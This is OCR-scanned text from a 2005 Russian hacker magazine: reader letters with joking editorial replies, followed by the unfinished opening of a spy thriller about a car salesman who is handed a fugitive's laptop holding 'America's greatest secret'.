OT: GEORGH_K [GEORGH_K@MAIL.RU] 


TEMA: СПЕЦ NoS!!! 


Я Ваш читатель с 2002 года, а пишу впервые. 

Хочу выразить большую благодарность за майский номер по цифровому видео! У 
меня есть огромное желание делать клипы по играм (нарезки) под музыку и с эффектами. Но 
банально не хватало теоретических знаний. Последний номер "СПЕЦ" дал мне это. Я умел ре- 
дактировать видео в PINNACLE (хорошей проги и простой, если видео захвачено ей самой), но 
Adobe Premiere и особенно VirtualDub вселяли в меня священный ужас. Незнание и страх те- 
перь позади, а желание теперь подкреплено знаниями. Первый мой клип - по игре "The 
Chronicles of Riddick - EFBB" - готов (игра очень зацепила: сильно и стильно, как и фильмы). 

Я давно читаю Ваши журналы, но я далеко не хакер, и в некоторых темах, которым посвяще- 
ны целые номера, я ни черта не понимаю. Но я их покупаю. Почему? Себя я характеризую как 
продвинутого пользователя, и если тему я не знаю, то это не значит, что она мне не понадобит- 
ся в скором будущем. Я продвигаюсь последовательно. А в жизни даже самые скромные позна- 
ния в незнакомом вопросе очень помогут не утонуть в море информации, Т-технологий, etc. 

ХАКЕР - это образ жизни. 

Ив этом плане моя библиотека из многих годовых подписок номеров "ХАКЕР", "СПЕЦ" и "ЖЕЛЕЗО" 
БЕСЦЕННА! А цифровое видео я просто люблю, это для души. Или не дает спать слава 0.y.Goblina? 

Спасибо Вам за отличные журналы! Вы правильно делаете свое дело! ЖЕЛАЮ ВАМ УСПЕХОВ! 

С Уважением - Георгий Ю. Козлов. 

aka BretonGEORG, 37ner, СПб. 


OTBET: 

Ты крут, мужик! Вот когда я читаю такие письма, на моем лице высыхают 
слезы, которые я уже излил по поводу писем в духе "почему кряков нет на 
диске, что за мода пошла - проги без кряков поставлять, распоясались, ага?". 
Очень бодрят нас такие письма. Поэтому есть у меня такое предложение. То- 
варищ! Читатель! Если Спец сподвигнул тебя на какие-то достижения в облас- 
ти видео, программинга, звука и прочих компьютерных дел, присылай нам 
свой шедевр с описанием, мы постараемся выложить его на наш диск, чтобы 
простимулировать народ на аналогичные свершения :). 


OT: РОМАН СОЛОШЕНКО [SARMATS3@YANDEX.RU] 


ТЕМА: ЗАПИСЫВАТЬ DVD НА CD-RW ПРИВОДЕ. 


Получил в подарок майский номер Вашего журнала ("Хакер"). По части цифрово- 

го видео очень понравился, но вот еще заинтересовала следующая фраза из руб- 
рики "е-мыло": "...Просите у Sky's "крякер интернета", он поможет записать любой DVD на 
любом СО-приводе..." Хотелось бы получить пояснения по этому вопросу. Это что-то из об- 
ласти тонкого технического юмора? Я не особо разбираюсь в этом, но различий между CD и 
DVD, кроме как в толщине дорожки и, как следствие, объеме информации, я не вижу. Там и 
там, насколько мне известно, применяются голубые лазеры. Переписать драйвер устройства - 
это тоже не из области фантастики. Прошу ответить поточнее: "да, возможно" (и укажите 
конкретный способ) или "нет, нельзя" (и укажите конкретные физические ограничения). 

Заранее спасибо. 


ОТВЕТ: 

Нет, что ты, какой юмор? Разве я похож на шутника? Эх, сколько мы драйве- 
ров перепрошили нашими крякерами, сколько углеродных лазеров сменили на 
рубидиевые или гелий-неонные (легко делается программно, кстати) - не пере- 
считать. Из таких компьютеров мы делаем зомби, в качестве компенсации объе- 
диняем их в большие такие коммьюнити - ботнеты называются. Если и ты хо- 
чешь вступить в подобное общество на добровольных началах, больше слу- 
шай людей, обещающих тебе халявный интернет и перепрошивку CD в DVD. 

(А если серьезно, то записать что-либо на CD-npuBoge, не СО-рекордере, 
невозможно by definition - прим. Sky.) 
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OT: SAUNDERS 


[LAGAPIIY@LEGISLATOR.COM] 
ТЕМА: ДЛЯ ТЕБЯ :) 


Две девушки студентки первого 
курса Института культуры и ис- 

кусств. Господа бизнесмены, окажите по- 
сильную помощь в оплате нашего обуче- 
ния. Нам просто не хватает настоящей 
мужской поддержки. Ни мужа, ни друга, 
только огромный город вокруг с опаснос- 
тями, подстерегающими маленьких кисок 
на каждом шагу. Вот так от мамы уходить. 

Нормальных мужчин вокруг - менее 2%, 
остальные жмоты, уроды и голубые. Вот 
мы решили найти мужчин своей мечты че- 
рез интернет. Не осуждайте нас за это, это 
от беспросветности. А мы такие хорошие. 
Ну вот, к примеру, я - Ольга, 22 года мне, 
хоть о возрасте лучше и молчать, зато 
рост 172, стройная (42-44), загорелая go 
бронзового цвета шатенка с белоснежны- 
ми зубами и улыбкой мадонны. 0, как 
Вам? У меня веселый нрав, я ненавижу ха- 
мов, Хабалов и жмотов, зато люблю полно- 
ценное общение, главное, чтобы мужчина 
был настоящий... И моя подруга Ксюша, мы 
с ней разные и притягиваемся, как разные 
полюса магнитов. Она любит в отрыв ухо- 
дить с погружением, как водолаз, но мы 
друг друга любим. Только вот финансово 
нам никто не помогает, а жить сейчас так 
непросто. 

Если ты хороший парень, не так уж скуп 
ине дурак... А может, впрямь? Оксана. 


ОТВЕТ: 

Это же надо! Одни, переехали в 
большой город, без мужа (хотя бы 
одного на двоих), а кругом - жмо- 
ты, голубые, уроды, алкоголики и 
тунеядцы. И зачем, зачем такие 
жертвы? Ради учебы в Институте 
культуры. Кстати насчет голубых. 
В этой фразе я вижу попытку 
дискриминировать людей с нетра- 
диционной ориентацией, что, если 
учесть вашу же фразу "но мы друг 
друга любим", выглядит несколько 
парадоксально. Так вот, милые да- 
мы. Если у вас любовь - тут ничего 
не поделаешь. Деньги - они ведь 
только убивают любовь, поэтому 
лучше вам жить в общаге на сти- 
пендию, кушать лапшу дошиРак 
(ДошиГастрит и дошиЯзву), учить- 
ся в Институте культуры и полу- 
чать там свое сомнительное обра- 
зование. А если вам все же захо- 
чется слегка поправить ориента- 
цию, добро пожаловать! У нас есть 
Sky. Для любителей (любительниц, 
хотя, судя по фразе "главное, что- 
бы мужчина был настоящий", вы к 
ним не относитесь) есть еще Sky 
пластиковый, железный, надувной. 
Заодно проверите свои силы: как 
говорится, не бывает нефункцио- 
нального надувного ЗКу"я - бывают 
слабые легкие. 
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Niro (niro@real.xakep.ru) 


"Совершенно секретно. 
В единственном экземпля- 
ре. После прочтения унич- 
TOMUTb. 

Проведение акции 
"Жизнь прекрасна", наз- 
наченной на 14 августа 
200... года, переношу на 
17 августа и санкциони- 
рую. Личность подвергае- 
мого воздействию уста- 
новлена, проверена, все 
данные психоанализа подтверждены. Информацию, необхо- 
димую для проведения акции, предоставить группе прикры- 
ТИЯ За 24 часа gO начала акции, взять подписку о неразгла- 
шении. В случае неадекватного поведения объекта и неконт- 
ролируемого развития ситуации действовать по инструкции 
"Лемур". 0 выполнении доложить лично. 

Без подписи". 


жжжжх 


Начнем с того, что Брайан был честным человеком. Нас- 
только честным, насколько позволяло и одобряло окружаю- 
щее общество. Он ни разу не был судим, не совершал проти- 
воправных поступков, оплачивал счета за парковку, вовремя 
вносил проценты кредита за дом, говорил правду в глаза сво- 
ему боссу и всем подчиненным, периодически сотрудничал с 
полицией (особенно если это касалось проблем, связанных с 
терроризмом или с наркотиками). Образец для подражания, 
этакая американская мечта с точки зрения правосудия. 

Он был честным, чувствовал это, понимал и был доволен 
своим образом жизни. Он, конечно, не возводил все это на 
уровень культа, мог и приврать для красного словца, но в 
меру - ровно настолько, насколько позволяла ситуация. Бу- 
дучи страстным любителем рыбалки (в детстве его приучил к 
удочке отец, Брайан остался благодарен ему на всю жизнь), 
он не мог без того, чтобы, как и все рыбаки мира, не приук- 
расить размеры и количество своего улова. Пожалуй, это 
была единственная тема, обсуждая которую, он не задумы- 
вался о том, врет ли он. Сам принцип рассказа о том, как он 
удачно провел уик-энд на озере, вытаскивая рыбин десятка- 
ми из чистейшей голубой воды, подразумевал преувеличе- 
ние, и уж Брайан никогда не упускал возможности прихваст- 
нуть перед собеседниками. Порой он сам не замечал, как 
вступал в противоречие со словами, сказанными пять минут 
назад. Но те, перед кем он расписывал свои рыбацкие подви- 
ги, прощали ему это, ибо сами были из того же теста. Такая 
ложь была абсолютно безобидна, это понимали все... 

-...Этот окунь был весом... весом... - он задумывался на 
пару секунд, чтобы сообразить, насколько же стоит приукра- 
сить, а потом продолжал. - Ну, в моей жизни всякие попада- 
ЛИСЬ, НО ЭТОТ... 

И все понимали, что вес не стоит даже упоминать - такой 
он огромный. А уж если дело доходило д0 разговоров о при- 
зах, полученных им и его отцом в различных рыбацких сос- 
тязаниях, тут не было конца и края многочисленным подви- 
гам семьи Брайана Томпсона. Они, похоже, сумели сделать 
всех в округе. 

В общем и целом Брайан был добропорядочным амери- 
канцем, жил по законам этой большой страны, поддерживал 
ее во всех начинаниях от полетов в космос до войны в Ира- 
ке. Его никогда не тянуло на подвиги. Он считал, что ему есть 
что терять, что живет он лучше многих, без всякой зависти и 
презрения, у него хорошая работа, чудесная семья и наи- 
прекраснейший дом. Быть таким, как Брайан, и жить в золо- 
том веке американской мечты - чего еще можно желать?! 

Вот только жизненный опыт подсказывает, что так красиво и 
радужно не может быть всегда. Слишком хорошо - тоже плохо. 

Сам Брайан не видел ничего, что было бы в состоянии из- 
менить его жизнь в худшую сторону. Работа (он продавал 
подержанные машины) была, как ему казалось, вечной. По- 
держанные машины будут всегда, и этот принцип обещал 
ему никогда не потерять работу. Этот вид деятельности при- 
носил вполне приличные деньги: Брайан успевал раздавать 


долги перед государством, одевать жену, любить сыновей, 
раз в год отправлять их всех к маме во Флориду с большим 
количеством подарков и время от времени радовать себя 
всякими мелочами. Последней "приятной мелочью", которая 
вошла в жизнь Брайана, стал ноутбук. 

С этого места надо бы поподробнее. 

Приобретение было стоящим, что и говорить. Новенький 
"Мак" с великолепными внутренностями, мечта любого, кто 
хоть чуть-чуть понимает в компьютерах. Брайан долго не мог 
успокоиться от осознания факта обладания этим устрой- 
ством, он даже пару раз просыпался среди ночи и заворо- 
женно смотрел на покусанное яблочко на обратной стороне 
крышки... 

День, когда "Макинтош" вошел в его жизнь, Брайан за- 
помнил надолго. В тот вечер он поздно возвращался с рабо- 
ты, у него сорвалось несколько сделок, с которых он мог бы 
получить неплохой процент, и поэтому он впал в дурное рас- 
положение духа. На носу были очередные кредитные выпла- 
ты, которые он всегда вносил полностью и в срок, поэтому 
уплывшие из-под носа клиенты были для него как заноза в 
пятке. 

"Надо же так опростоволоситься!" 

Он горевал по этому поводу, не в силах опомниться от то- 
го, что три (целых три!) человека сегодня непостижимым об- 
разом ускользнули из его крепких объятий. Он умел прода- 
вать как никто другой, и при этом он еще умудрялся соблю- 
дать некий кодекс чести продавца, стараясь не выходить за 
свои "честные" рамки. 

"Ведь все шло как по маслу... «Форд», «Кадиллак» и 
«Крайслер»... Как же так?.." 


Вот только жизненный опыт 
подсказывает, что так красиво и 
радужно не может быть всегоа. 


Он сам не понял, что же было не так. Почему-то люди, как 
только дело доходило до обсуждения цены, становились не- 
решительными, вялыми и практически не заинтересованны- 
ми в покупке машины. Зачем же тогда было приходить в ма- 
газин, если ты понимаешь, что пока не готов к такому приоб- 
ретению? Ему особенно запомнился последний покупатель, 
который, посидев за рулем "Крайслера", похлопал рукой по 
кожаному сиденью рядом с собой и вдруг спросил Брайана: 

- А вам нравится ваша работа? 

Брайан тогда опешил, смутился и, как всегда, выпалил 
правду: 

- Не очень, мистер... Хотя я уверен, что в наше время эта 
работа - достаточно стабильный источник дохода. Правда, у 
русских есть поговорка: "Хорошо там, где нас нет..." 

- У русских?.. - поднял брови покупатель. - У русских... А 
мне вот, знаете, моя работа очень нравится. И машина бы 
мне на этой работе пригодилась... 

- Акем вы работаете, если не секрет, мистер? - беседа 
Брайану очень не нравилась, он чувствовал, что человек 
сейчас встанет с водительского сиденья, прикроет дверь и 
распрощается, не дав продавцу никаких шансов. 

- Да так, не очень пыльное место... Можно сказать, ком- 
мивояжер. Но в данный момент пока на отдыхе. 

- Да, - покачал головой Брайан. - Коммивояжеру машина 
нужна как воздух. Вы, наверное, много ездите по штату? 

- Не только по штату! Приходится мотаться по всей стране, - 
человек погладил рулевое колесо, попробовал педали, потом 
вытащил ключ зажигания из замка и протянул его продавцу. 
- Видимо, придется это делать не на вашей машине. 

Он встал с кресла и захлопнул дверь. 

- Как же вы разъезжаете по стране сейчас? - удивился 
Брайан. - Похоже, вы без автомобиля... Сюда вы пришли 
пешком, уходите и поглядываете на часы, значит, ждете авто- 
бус... Я думаю, нам стоит продолжить переговоры по цене, и 
мы найдем компромисс. Автомобиль устроит вас, цена - меня. 
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Покупатель улыбнулся самой что ни на есть голливудской 
улыбкой, подмигнул Брайану и ответил: 

- Я вам верю, но - не в этот раз. 

Он вздохнул так, словно с неохотой расставался с 
мыслью о покупке машины, потом повернулся к Брайану спи- 
ной и направился к выходу из салона. Брайан закусил губу и 
собрался было бежать за уходящим покупателем, но в пос- 
ледний момент раздумал. Сегодня явно был не его день... 

-...Вот ведь, - продолжал шептать он себе под нос по go- 
роге домой. - Надо будет почитать что-нибудь по технологи- 
ям продаж, по психологии, еще что-нибудь... Расслабился, 
вновь поверил в свой шарм и умение убеждать... Так тебе 
и надо! 

Он с досады пнул гравий под ногами, обозначивший нача- 
ло тропинки к дому, остановился и вытащил из кармана 
джинсов пачку сигарет. Дым заставил его расслабиться. Он 
затянулся и поднял глаза к небу. 

- А ведь остальные покупатели были такими же странны- 
ми, - воруг признался он сам себе. - Трепались ни о чем... 
Первый спросил меня, что я думаю о женщинах. Ну не глу- 
пость ли? И Begb, как и третий, в этот момент он сидел за ру- 
лем, гладил оплетку и рассматривал себя в зеркало заднего 
вида. Нарцисс... Ему я не смог продать "Форд". Или он не за- 
хотел купить? 

Несколько затяжек он сделал молча, сосредоточенно пе- 
редвигая носком ботинка камешки под ногами. Фигуры из 
камней получались какие-то корявые, ничего путного не вы- 
ходило; он бросил это и вновь спросил сам себя: 

- Ну, а второй? Которому так приглянулся "Кадиллак"? "А 
вы за кого голосовали?" Это что, как-то меняет дело? Хотя... 


Вы не пожалеете... 
Это не просто компьютер, 
не просто... 


Откуда же мне было знать, что он консерватор? Ведь когда 
сидишь за рулем, то все равно, кто ты: правила дорожного 
движения написаны для всех. Никогда не поймешь сразу, что 
людям от тебя надо. Вот я, к примеру, демократ. Что x, я те- 
перь представителям других партий не смогу даже колесо 
продать? Чушь собачья! 

Он швырнул окурок щелчком в кусты. 

- Все они какие-то ненормальные. День зря прошел. Луч- 
ше просто никого бы не было, чем знать, что ты упустил вер- 
ную тысячу... 

Подойдя к дверям дома, он вытащил руки из карманов, 
изобразил на лице довольную улыбку и уже собирался вой- 
ти на веранду, как вдруг сзади раздалось шуршание листвы. 
Кто-то большой и быстрый пробирался в сторону Брайана 
сквозь заросли кустарника. 

Шум не мог не насторожить Брайана. Он немного отступил 
в сторону от лестницы, ведущей к дому, внимательно всмот- 
релся в кустарник и попытался определить, кто же это мог 
быть и не пробежит ли он мимо. Это вполне могла оказаться 
бродячая собака, и тогда о ней стоило бы сообщить шерифу. 
Это мог быть и человек - и вот для такого варианта можно 
было придумать сколько угодно объяснений бега сквозь вет- 
ки. Бегущий тинэйджер, спасающийся от полиции после неу- 
дачной продажи очередной дозы "крэка"; любовник, переп- 
рыгивающий невысокие заборы, попавшийся в лапы мужа 
возлюбленной; вор, застигнутый на месте преступления, - 
это мог быть кто угодно. 

Оглянувшись по сторонам, Брайан взял в руки большую 
метлу, которую садовник, обслуживающий их район, присло- 
нил к забору и забыл здесь до завтрашнего дня, но на секун- 
gy представив себя со стороны с этой метлой в руках, отста- 
вил ее в сторону. 

- Нечего тут играть в Гарри Поттера, - часто дыша, сказал 
он сам себе. В нем нарастала волна страха и возбуждения. 
Шум ветвей приближался. 
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Где-то вдалеке взвизгнули тормоза, потом хлопнули 
дверцы, раздался стук подошв по асфальту дороги. Брайан 
заметался взглядом от кустарников к дороге, не понимая, 
что происходит. Рука снова протянулась за метлой - дере- 
вяшка в руке придавала немного уверенности. Но вдруг где- 
то неподалеку грохнул выстрел, после чего он услышал 
крик, много раз повторявшийся в голливудских боевиках: 

- Freeze!!! 

Он почему-то сразу выронил метлу и почувствовал дрожь 
в коленках - невыносимую, подлую, всепоглощающую, ва- 
лящую с ног. А потом понял: сначала был выстрел, а потом 
предупреждающий крик. Или стреляли в полицейского, или 
сам полицейский творил беззаконие. 

- Господи, господи... - зашептал Брайан себе nog нос, по- 
том кинул быстрый взгляд на окна дома, умоляя жену и де- 
тей не высовываться, хотя прекрасно понимал, что, едва ус- 
лышав выстрел, жена уложит детей на пол и сама не подни- 
мет головы, пока не станет тихо - их когда-то инструктировал 
на этот счет помощник шерифа. 

И в эту секунду кусты раздвинулись прямо перед Брайа- 
ном. На поляну около дома выскочил человек в костюме, 
подволакивающий ногу и прижимающий рукой к животу что- 
то напоминающее тонкий чемоданчик. Через мгновенье он 
увидел перед собой Брайана и остановился, глядя ему прямо 
в глаза. 

Сам Брайан опешил не меньше, чем незваный гость. Они 
смотрели друг на друга, казалось, целую вечность, потом че- 
ловек принял какое-то решение и приблизился к Брайану. 
Стало слышно его тяжелое дыхание, крылья его носа ходили 
вверх-вниз, грудь вздымалась. Чувствовалось, что он очень 
устал. 

- Помогите, - произнес он хриплым голосом, подойдя поб- 
лиже. На правом бедре расплывалось пятно крови. - Возьми- 
те вот это, - и он протянул Брайану чемоданчик. 

В чемоданчике лежал ноутбук. Брайан разглядел на 
крышке покусанное яблочко и сделал шаг назад. Он был за- 
конопослушным гражданином и не мог взять ничего из рук 
того, за кем гналась полиция. 

- Возьмите, - человек покачнулся и едва не выпустил из 
рук компьютер. - Да помогите же мне, черт вас побери... 

На улице метрах в трехстах отсюда завыла сирена, но че- 
рез пару секунд замолкла. Шум, который поднимали бегу- 
щие полицейские, затих, слышалось только приглушенное 
переговариванье. Похоже, они потеряли того, кого преследо- 
вали, и производили перекличку. 

Брайан вдруг почувствовал, что откуда-то изнутри на во- 
лю просится желание помочь, поддержать раненого, прово- 
дить его к врачу, в общем, поучаствовать в его судьбе. 
Проклятое американское воспитание: между законом и сост- 
раданием идет вечная борьба, мораль конфликтует с госу- 
дарством, пистолет - и слезы, значок полицейского - и прин- 
ципы добра. Он машинально шагнул поближе и подхватил 
под руку готового упасть раненого. Ноутбук как-то сам со- 
бой оказался у него в другой руке, человек расстался с ним 
без сожаления. 

- Спасибо... - прошептал он, горячо дыша в шею Брайану. 
- Вы не пожалеете... Это не просто компьютер, не просто... 
Не просто "Макинтош". 

- Вам надо к врачу, - вставил слово Брайан, но человек 
перебил его: 

- Яне уйду далеко... И не потому что ранен: меня просто 
не отпустят. Слишком все круто завертелось... 

- И все-таки, - пытаясь увернуться от дыхания раненого, 
говорил Брайан. - Давайте вызовем парамедиков... А это вас 
преследует полиция? - наконец-то решился он на элементар- 
ный вопрос, который следовало задать сразу же. 

- Полиция? - ухмыльнулся человек и вдруг опустился на 
траву возле веранды, с трудом подавив стон. Брайан не смог 
удержать его и опустился рядом, прижимая к груди ноутбук. 
- Это не полиция... Все намного сложнее... Итак, мистер, ухо- 
дите... Берите ноутбук... А, вы уже взяли... Идите домой. 
Спрячьте его. Спрячьте как можно дальше. Хотя лучше всего 
было бы уничтожить его, но мне так жаль всей работы... 


- Яне могу это взять, - покачал головой Брайан. - Я gy- 
маю, вы нарушили закон, я должен отдать компьютер в соот- 
ветствующие органы... 

- Да бросьте вы, право! - возмутился раненый. - Мне ос- 
талось жить несколько минут, выполните волю умирающего! 

- Но, судя по ранению, все не так уж плохо, - пожал пле- 
чами Брайан. - Вас вылечат... 

- Меня застрелят, как только найдут. Помогите мне встать. 
Помогите, я прошу вас! 

Они поднялись. Брайан по-прежнему держал ноутбук, го- 
товый отдать его хозяину. 

- Это ваш дом? - кивнул на веранду раненый. - Идите, я 
умоляю вас. Никто не станет искать его у вас. Они не видели, 
что я взял "Мак" с собой. Поймите, здесь (он ткнул пальцем 
в ноутбук) величайшая тайна Америки. Ответ на вопрос, ко- 
торый вот уже много лет волнует всех, кто живет в этой 
стране. Я нашел этот ответ, и, поверьте, я от него не в вос- 
торге. Мне не дадут жить с этим знанием - вы же будете вне 
подозрений. 

Раненый внезапно дернулся, прислушиваясь. Голоса ста- 
ли ближе. 

- Пора, - он оттолкнул Брайана от себя в сторону веранды. - 
Уходите - или вас посчитают причастным. И ТОГДА УБЬЮТ 
НАС ОБОИХ. 

Что-то в голосе несчастного заставило Брайана отступить 
туда, куда его направила сильная рука. Человек кивнул ему 
и тут же забыл о его существовании, снова превратившись в 
загнанного волка. Он пригнулся и нырнул в следующий ряд 
кустов, припадая на раненую ногу. А через десять-пятнад- 
цать секунд грянули выстрелы. Один, второй, третий... Потом 
Брайан сбился со счета. На улице шла перестрелка, где-то 
зазвенели стекла, завыла сигнализация оставленной на ули- 
це машины соседей. Внезапно стрельба стихла... 

Он Bgpyr понял, что стоит на веранде с ноутбуком под 
мышкой, вслушиваясь в вечерние звуки. Не хватало только 
наткнуться сейчас на охранника правопорядка! Ему вдруг 
стало страшно, он поспешил войти в дом, даже не объяснив 
своей жене, что же такое он принес с собой. 

Ноутбук очень удачно устроился у него на столе рядом с 
кроватью. Мыслей спрятать его почему-то не возникло. 
Брайан чувствовал, что все произошедшее сейчас на улице 
так и останется там, среди кустов и воющих сирен. Он не бо- 
ялся тех, кто может войти среди ночи для обыска в дом зако- 
нопослушного гражданина Америки. Он был готов отдать все 
в руки правосудия и рассказать, как все было. 

НО НИКТО НЕ ПРИШЕЛ. 


жжжжх 


"Настоящим докладываю, что операция "Жизнь прекрас- 
на" начата в срок без каких-либо осложнений. Сторонних 
влияний и случайных факторов не отмечено. Объект под 
постоянным наблюдением. Инструкция "Лемур" в текущий 
момент времени не нужна. Наблюдение непрерывное, мно- 
гоканальное. Агентурная поддержка в полном объеме. Про- 
шу усилить группу специалистами из отдела контроля за ин- 


формационными технологиями - в них испытываю явную 
нехватку. 

Прошу не делать никаких оргвыводов по отношению к ор- 
ганизатору акции - данная необходимость в хакерах возник- 
ла ex tempore. Предполагаю, что могут возникнуть незначи- 
тельные осложнения, связанные в основном с непрофессио- 
нализмом объекта. 

Без подписи". 


* жжжхж 


Брайан терпеливо ждал, когда же кто-нибудь в форме 
офицера полиции явится к нему за ноутбуком. Он видел в ок- 
но, как двое полицейских с собакой прошли возле его веран- 
ды, внимательно изучая следы на траве. Один из них дал ка- 
кую-то команду овчарке, Ta навострила уши, принюхалась и 
разочарованно взглянула на хозяина. Похоже, она была на 
перепутье. 

Напарник посмотрел на окна дома, возле которого они 
стояли. Брайан машинально спрятался за занавеску и кинул 
взгляд на компьютер, который лежал на столе. Жена, выгля- 
нув из спальни, непонимающе рассматривала мужа и пыта- 
лась увидеть, от кого же он прячется. 

- Что случилось, дорогой? - наконец спросила она. 

- Пока не знаю, - не поворачивая головы, ответил Брайан. 
- Но что-то очень непонятное... 

Тем временем полицейские о чем-то посовещались, и 
один из них, тот, что без собаки, поднялся по ступенькам ве- 
ранды. Стук в дверь заставил Брайана вздрогнуть; он пере- 
минался с ноги на ногу, не решаясь открыть. 


Полицейский старался загля- 
нуть внутрь дома, но Брайан 
не позволял ему сделать это. 


Жена удивленно смотрела на мужа. Впервые в жизни он 
чего-то боялся и не спешил открывать дверь. Потом она уви- 
дела "Макинтош". 

- Что это? - кивнула она в сторону стола. 

- Тихо, - ответил Брайан. - Я ничего не могу тебе объяс- 
нить, потому что сам ничего не понимаю. 

Наконец он решился, подошел к двери и открыл ее едва 
ли наполовину. 

- Извините, мистер, - спросил полицейский, - вы слышали 
около получаса назад стрельбу? 

- Конечно, слышал, - кивнул Брайан, не собираясь откры- 
вать дверь пошире. - Я как раз пришел с работы, когда все 
это началось. А что случилось? 

- Ничего особенного, так, пустяки... А вы не видели здесь 
никого или ничего подозрительного, запоминающегося - че- 
го-то, чего в это время здесь быть не должно? 

Полицейский старался заглянуть внутрь дома, но Брайан 
не позволял ему сделать это. 
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- Ничего я не видел, - отрицательно покачал он головой. - 
Едва услышав стрельбу, я с детьми укрылся в кладовой. Ма- 
ло ли что, вдруг в окно влетит шальная пуля... Но, знаете, 
это черт знает что, среди дня в центре квартала идет перест- 
penka, а полицейские появляются лишь спустя полчаса! 

Брайан пытался сделать возмущенный вид, и, похоже, у 
него это получилось. Офицер извинился, кинул последний 
взгляд внутрь комнаты через плечо Брайана, отдал честь и 
вернулся к напарнику. Собака, терпеливо сидевшая на траве, 
вскочила и завиляла хвостом. Брайан закрыл дверь и огля- 
нулся на жену. 

Лора стояла в той же позе, прикрыв рот рукой. 

- Ты все-таки объясни, что происходит, - произнесла она 
сквозь пальцы. 

- Если б я знал... - махнул рукой Брайан и подошел к сто- 
лу. - Все дело в этой чертовой штуке. 

Он положил ладонь на крышку ноутбука. Машина была 
слегка теплой. Похоже, тот человек довольно долго прижи- 
мал ее к своему животу. 

- Величайшая тайна Америки, - сказал Брайан, не обраща- 
ясь ни к ком). - Что бы это могло быть? 

Он опустился на стул рядом и положил голову на ладони, 
не отрывая взгляда от ноутбука. Лора подошла и положила 
руки ему на плечи. 

- Что это была за стрельба? - спросила она мужа, масси- 
руя его плечи. - Малыши перепугались, я спряталась с ними 
в подвале... 

- В кладовой, - машинально поправил ее Брайан, поглажи- 
вая пальцем яблочко на крышке. 


Было единственное, что 
практически сразу бросалось в 
глаза, - даты, стоящие в конце 

документов. 


- В подвале, милый? Ты ошибаешься, - удивленно приос- 
тановилась Лора на пару секунд, после чего продолжила 
разминать мышцы мужа. Брайан высвободил свою шею из 
сильных пальцев жены, встал и, повернувшись к ней, по- 
вторил: 

- В кладовой. Мы были в кладовой все вместе, в том чис- 
Ле я. Запомни это раз и навсегда. И если тебя кто-нибудь 
спросит, ты ответишь то, что я тебе сейчас сказал. Дети еще 
слишком маленькие, чтобы кто-нибудь принимал их слова 
всерьез, так что... Запомнила? 

Лора кивнула и в недоумении отступила на шаг. Брайан 
смотрел на нее каким-то чужим взглядом, в котором не было 
ни грамма любви и нежности. Правда, и ненавистью это наз- 
вать было нельзя: его взгляд был просто пуст. Он видел пе- 
ред собой жену, но чувствовалось, что на ее лице он разли- 
чает эмблему "Мака". 

- Воти хорошо, - кивнул он, не слыша от жены в ответ ни 
слова. - Мы сразу обо всем договорились. Теперь вот об 
ЭТОМ... - он кивнул на ноутбук. - Будем считать, что этой шту- 
ки у нас в доме нет. Вполне возможно, что она в скором бу- 
дущем кому-нибудь понадобится. (Он вспомнил те выстрелы, 
особенно в конце перестрелки, когда на всю улицу бахнуло 
помповое ружье, и решил, что вряд ли в ближайшее время 
кому-нибудь будет дело до компьютера.) Я не считаю себя 
человеком, который присвоил чужое, но... Но сегодня я впер- 
вые в жизни солгал полицейскому. Поэтому... Поэтому пока 
без комментариев. 

Лора машинально кивнула в ответ на его длинный моно- 
лог, оглянулась куда-то за спину, где копошились с игрушка- 
ми дети, и вдруг заплакала. Брайан нахмурился, подошел 
ближе, положил руку ей на голову, провел ладонью по 
волосам. 

- Ничего страшного, - произнес он таким тоном, что сразу 
стало ясно: дела, в общем-то, плохи. - Не думаю, что за все 
то, что здесь произошло, мне придется ответить. Надеюсь на 
лучшее. 


ХАКЕРСПЕЦ | 09(58) | 2005 


Он вернулся за стол, открыл крышку ноутбука и включил 
его. Спустя полминуты он уже видел перед собой рабочий 
стол "Мака" с уложенной на нем тигровой шкурой. 

Значков было минимум. Нельзя сказать, что Брайан был 
хорошим пользователем компьютера. Он работал за компом 
нечасто, время от времени устраивал на нем подсчеты воз- 
можной прибыли и продаж, играл в стратегии... 

Он прошелся пальцем по сенсорной панели, имитирую- 
щей мышь, отметил про себя неудобство, связанное с тем, 
что пальцы до сих пор мелко дрожат и попасть куда-либо 
было достаточно сложной задачей. Взглянув на часы, он су- 
нул руку в карман, нашел там несколько долларов и пулей 
выбежал на улицу, вспомнив, что неподалеку в супермарке- 
те есть компьютерный отдел, который работает допоздна. 
Спустя двадцать пять минут он уже просматривал содержи- 
мое компьютера, так загадочно попавшего в его в руки, с по 
мощью удобного манипулятора. 

И НЕ НАШЕЛ ТАМ НИКАКОЙ ТАЙНЫ. 


жжжжх 


"...проводимое за объектом наблюдение в настоящий мо- 
мент дает отрицательные результаты; мы не можем опреде- 
лить, насколько далеко объект продвинулся в изучении инте- 
ресующей нас информации... 

..выводы делать пока рано, однако возникает ощущение 
бессмысленности выбора - и это несмотря на то, что подгото- 
вительный этап прошел без каких-либо осложнений... 

...есть предложение активизировать объект... план акти- 
визации отправляется следующим рапортом..." 


* * * * * 


Брайан провел за ноутбуком почти всю неделю: вечерами 
он приходил с работы, которая всю эту неделю шла из рук 
вон плохо (по большому счету, Брайан не уделял ей должно- 
го внимания, поскольку все его мысли были заняты той ин- 
формацией, что он просмотрел на компе за предыдущий ве- 
чер и полночи), садился за "Мак" и пропадал едва ли не go 
утра. Компьютер был просто напичкан информацией под за- 
вязку. Имея на борту почти двухсотгигабайтный жесткий 
диск, "Макинтош" вмещал в себя уйму непонятной информа- 
ции, расклассифицированной по какому-то трудно постижи- 
мому принципу. 

В основном это были какие-то документы, напоминающие 
отчеты: вверху стояла нечитаемая шапка, над которой посто- 
янно всплывал значок недоступности (понять, кому адресо- 
ваны эти документы, было невозможно). Потом шла некая 
цифровая часть, что-то напоминающее шифровки шпионов 
из фильмов о Джеймсе Бонде - тут понять уже было просто 
невозможно. Было единственное, что практически сразу бро- 
салось в глаза, - даты, стоящие в конце документов. Почти 
все они были датированы шестидесятыми годами. Этого 
Брайан не мог понять: компьютеров тогда не было, неужели 
кому-то было не лень оцифровывать такую уйму бумаги и 
запихивать ее в ноутбук? 

Правда, временами попадалось и что-то вполне удобова- 
римое, но, к сожалению, совершенно бесполезное. Какие-то 
политические доклады бывших президентов, которые и так 
можно было прочитать в любой публичной библиотеке, по- 
рывшись в старых подшивках (если нужен оригинал) или 
просто пошарив в интернете. 

- Чушь какая-то, - бурчал он себе под нос, лениво ковы- 
ряясь вилкой в тарелке с макаронами (заботливая Лора nog- 
